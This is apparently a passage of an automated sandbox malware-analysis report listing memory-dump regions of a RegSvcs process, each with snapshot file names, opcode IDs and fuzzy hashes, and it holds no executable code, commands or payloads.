1679->1724 1683 51b4022-51b4034 1685->1656 1686->1656 1687->1656 1688->1657 1689->1657 1690->1660 1691->1660 1692->1660 1693->1662 1694->1662 1695->1662 1696->1664 1697->1664 1698->1664 1699->1666 1700->1666 1701->1666 1702->1668 1703->1668 1704->1668 1705->1670 1706->1670 1707->1670 1708->1672 1709->1672 1710->1672 1711->1674 1712->1674 1713->1674 1714->1676 1715->1676 1716->1676 1717->1679 1718->1679 1719->1679 1720->1648 1721->1648 1722->1648 1723->1683 1724->1683 1725->1652 1726->1652 1727->1652
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f977ad9d4998bccc4b42229f8f92eaea6b2f11d5e90c527a86a5090c695fe994
                            • Instruction ID: 295a4dbb8aaf2dbdb3e5d04aeccba071fbc93cfa132ead6dab6a72c4e7f84ae8
                            • Opcode Fuzzy Hash: f977ad9d4998bccc4b42229f8f92eaea6b2f11d5e90c527a86a5090c695fe994
                            • Instruction Fuzzy Hash: 82512A72111211CFC719FF34F858A5937A6FB803693128ABAD005CB2ACDB369C66CB94
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b710175861c3a5f349c89072612046fdb6fb39fff5790d14a72da1fde425932c
                            • Instruction ID: c973a949135d219dec02f7050c0196431d1d4096dc6544234d5c258c3df4c378
                            • Opcode Fuzzy Hash: b710175861c3a5f349c89072612046fdb6fb39fff5790d14a72da1fde425932c
                            • Instruction Fuzzy Hash: 9D4181B1E00209AFCB04DFB995546AEBBFAEF84310F20C969D449D7346DB749A42CB91
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 88db996b575148b9ca61779a33b99d1cd98ead152f59fc7b9abbe57a40c7689b
                            • Instruction ID: 1b038a368d09b42ddb2bae25069f5eed6dcf619db617e2b1ba0387020f3fb4bf
                            • Opcode Fuzzy Hash: 88db996b575148b9ca61779a33b99d1cd98ead152f59fc7b9abbe57a40c7689b
                            • Instruction Fuzzy Hash: 95419D317002028FEB2CAB75D8586BE7BE6BF842447404D3AC467C72A4EFA5D852CB91
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4dcba304c45949935a0c718fb2f07030fbfa78a79bc153137f2a27d44316e63
                            • Instruction ID: 4d6042aea5523524da12b4a564d1cb063c406895f81084a2aa905dfe66edb213
                            • Opcode Fuzzy Hash: a4dcba304c45949935a0c718fb2f07030fbfa78a79bc153137f2a27d44316e63
                            • Instruction Fuzzy Hash: ED41A0303002028FEB2CAB75D8686BE76E6BF442443404D3EC42BC7294EFA5D852CB96
                            Memory Dump Source
                            • Source File: 00000016.00000002.3385364862.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_10fd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81d6f690dad12da68b23988ed5f18e78d0db4246fb1083bdc5148f7db822b6d3
                            • Instruction ID: 356ed2415db1daeb107d76b59b5b2a3aafada76e1a68c4aabddd45788728122b
                            • Opcode Fuzzy Hash: 81d6f690dad12da68b23988ed5f18e78d0db4246fb1083bdc5148f7db822b6d3
                            • Instruction Fuzzy Hash: 7C21D6B1504200DFDB05DF98D9C5B2ABFA5FB84314F24C5ADDB890B656C33AD416CBA2
                            Memory Dump Source
                            • Source File: 00000016.00000002.3385364862.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_10fd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f2e21e7f47fc7e11c8f1adb73e831da946053d3d40df433c6e52b4c4ae31845
                            • Instruction ID: ee2b350ae10d57bc26778cdeeaa9fc2d86d061e64e99e27417278b568ba0f289
                            • Opcode Fuzzy Hash: 7f2e21e7f47fc7e11c8f1adb73e831da946053d3d40df433c6e52b4c4ae31845
                            • Instruction Fuzzy Hash: 3F2100B1504200DFDB05DF98D9C5F2ABFA5FB88314F2485ADEA490B616C33AD456CBA2
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 22aa1765717c7edbe962a66bb786ee1176ad6ccd36a9af8993596db78fc97747
                            • Instruction ID: cb467cc021e525b098d3ce70a146a946a48b1d3ab1feef76773167ddaa19aa11
                            • Opcode Fuzzy Hash: 22aa1765717c7edbe962a66bb786ee1176ad6ccd36a9af8993596db78fc97747
                            • Instruction Fuzzy Hash: CE119171E00241CFCB64EBB8D4089AA7BF6EF8831471248BAD446D7395EB758D42CB54
                            Memory Dump Source
                            • Source File: 00000016.00000002.3385364862.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_10fd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d0536380c2050cc7cc8b12e5dc0c15b32ba20069f34e23ee035dde2d3525b62
                            • Instruction ID: d8f9fec74190a9cae00299490eae386d3322e5dff4930e9c147964bc2a8c3c64
                            • Opcode Fuzzy Hash: 4d0536380c2050cc7cc8b12e5dc0c15b32ba20069f34e23ee035dde2d3525b62
                            • Instruction Fuzzy Hash: 5F21D276504240CFCB06CF44D9C4B16BFB2FB84310F24C5A9DE480B616C33AD416CBA2
                            Memory Dump Source
                            • Source File: 00000016.00000002.3385364862.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_10fd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14534b79b66c896ac0d5baafb59a6ce94307be6875aeb631b8849d0664d6cd6d
                            • Instruction ID: 4e36100d852ae5e02a5b9f7292e993373334e5c7c49fc3e4eb0f25ca05c3b120
                            • Opcode Fuzzy Hash: 14534b79b66c896ac0d5baafb59a6ce94307be6875aeb631b8849d0664d6cd6d
                            • Instruction Fuzzy Hash: 3011E172404280CFCB02CF44D5C4B16BFA1FB88314F28C5ADD9490B617C336D45ADBA2
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ea54df56e1c62ed7b68b4c7f9d0a1324ed0141114fcc09f525e5b7e7424ed9fe
                            • Instruction ID: 41f213e35bef3c32369ee89457249835b5cf2bafafe48a9028df032a12435fd3
                            • Opcode Fuzzy Hash: ea54df56e1c62ed7b68b4c7f9d0a1324ed0141114fcc09f525e5b7e7424ed9fe
                            • Instruction Fuzzy Hash: F5118E70B00245DFCB64EBBDD40866A7BEABF8821471148B9D406DB395EB75DC42CB90
                            Memory Dump Source
                            • Source File: 00000016.00000002.3385364862.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_10fd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b194dad01d5b1bbc92d85f867e5b00bf25be96b0a5768bb845869012fbb1cda3
                            • Instruction ID: 7eb0aa45c1cd854a7635b619a5c5e5ee11b1719a5a87b413492b86e2ac4805d6
                            • Opcode Fuzzy Hash: b194dad01d5b1bbc92d85f867e5b00bf25be96b0a5768bb845869012fbb1cda3
                            • Instruction Fuzzy Hash: 1E012B304053409AE7208A59CD84B67BFD8EF423A0F18C46EFF880B646C279D805C7B1
                            Memory Dump Source
                            • Source File: 00000016.00000002.3385364862.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_10fd000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e5da49fcd2f4e2a6a3e763debcc6b1b9699e7c8ff2aee230c6dee0534809dae
                            • Instruction ID: c4940b4370f904d78cdb0a49710ce91b270ead54cb0e06353775b60cab328dd5
                            • Opcode Fuzzy Hash: 0e5da49fcd2f4e2a6a3e763debcc6b1b9699e7c8ff2aee230c6dee0534809dae
                            • Instruction Fuzzy Hash: 08F0C271405344AEE7108A1AC884B62FFD8EF42374F28C45AFE880B286C2799844CBB0
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a9e04bffcc5159ec744fb0294e4b7626c5369d8e0fb7f83ac5f55d054d613317
                            • Instruction ID: d156822e9c5c9dca108722e2f703746c9fc51798d52db9cf3bd1cc31c9ca0289
                            • Opcode Fuzzy Hash: a9e04bffcc5159ec744fb0294e4b7626c5369d8e0fb7f83ac5f55d054d613317
                            • Instruction Fuzzy Hash: C8F0E2307100009FD7095B69E804BA57BEBAFC9A24F1981AAF515C7375CFA1DC00CB41
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b364ef41bc2ede393034ce2720a3e05e2c627463d3e1de653475c5b28f5635be
                            • Instruction ID: da74ab8dca747c73d43d0e4dfb1ce4894a38e31492d513ee33efc14e4cd3ec28
                            • Opcode Fuzzy Hash: b364ef41bc2ede393034ce2720a3e05e2c627463d3e1de653475c5b28f5635be
                            • Instruction Fuzzy Hash: 74C0807140C3C0DFD7171B645C555DB7FB54B53155F1541D7E044C51A3C1664D00C711
                            Memory Dump Source
                            • Source File: 00000016.00000002.3400330246.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_22_2_51b0000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 00ce3a833450f9a00f8aa087f7df6dfb4f57b1780be94e658783e43f813af030
                            • Instruction ID: 297435c09cce8e036a982b36838059c5ac8718e0516ea23dc4034416b3c7b818
                            • Opcode Fuzzy Hash: 00ce3a833450f9a00f8aa087f7df6dfb4f57b1780be94e658783e43f813af030
                            • Instruction Fuzzy Hash: 9790223000020CCB08002B803C08002B30C80000083800022E00C002020A2230000280